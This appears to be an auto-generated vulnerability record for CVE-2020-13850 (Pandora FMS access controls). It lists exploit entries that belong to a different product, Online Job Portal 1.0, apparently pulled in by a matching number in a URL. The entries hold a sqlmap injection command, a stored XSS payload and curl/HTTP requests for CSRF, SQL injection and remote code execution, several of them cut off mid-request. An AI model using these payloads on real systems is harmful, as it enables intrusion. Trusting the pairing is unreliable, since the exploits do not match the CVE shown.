CVE-2020-13850 (published 2020-06-11): Artica Pandora FMS 7.44 has inadequate access controls on a web folder.
Priority: P3 41 | Severity: high | CVSS 3.1 base score: 7.5
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS: 2.17% (80.0th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pandorafms | pandora_fms | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| NVD | 2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
No detection rules found.
Exploit-DB: Online Job Portal 1.0 - 'userid' SQL Injection (exploitdb · 2020-10-30)
---
# Exploit Title: Online Job Portal 1.0 - 'userid' SQL Injection
# Google Dork: N/A
# Date: 2020/10/28
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A
# Vulnerable URL: http://localhost/jobportal/Admin/EditUser.php?UserId='
Proof of Concept:
1. See vulnerable url.
2. Open sqlmap and use " sqlmap -u "http://localhost/jobportal/Admin/EditUser.php?UserId='" --dbs " command.
Exploit-DB: Online Job Portal 1.0 - Cross Site Scripting (Stored) (exploitdb · 2020-10-19)
---
# Exploit Title: Online Job Portal 1.0 Cross Site Scripting (Stored)
# Google Dork: N/A
# Date: 2020/10/17
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A
Proof of Concept:
1 - Open URL http://localhost/jobportal/Employer/ManageJob.php
2 - Fill in the blanks with this payload: ">alert (1)
3 - And click submit button.
Exploit-DB: Online Job Portal 1.0 - Cross Site Request Forgery (Add User) (exploitdb · 2020-02-06)
---
# Exploit Title: Online Job Portal 1.0 - Cross Site Request Forgery (Add User)
# Dork: N/A
# Date: 2020-02-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: Linux
# CVE: N/A
# POC:
# 1)
# Add User..
#
POST /admin/user/controller.php?action=add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application
Exploit-DB: Online Job Portal 1.0 - 'user_email' SQL Injection (exploitdb · 2020-02-06)
---
# Exploit Title: Online Job Portal 1.0 - 'user_email' SQL Injection
# Dork: N/A
# Date: 2020-02-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: Linux
# CVE: N/A
# POC:
# 1)
#
curl -i -s -k -X $'POST' \
-H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -
Exploit-DB: Online Job Portal 1.0 - Remote Code Execution (exploitdb · 2020-02-06)
---
# Exploit Title: Online Job Portal 1.0 - Remote Code Execution
# Dork: N/A
# Date: 2020-02-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: Linux
# CVE: N/A
# POC:
# 1)
#
curl -i -s -k -X $'POST' \
-H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=----------------
No writeups or analysis indexed.
Published: 2020-06-11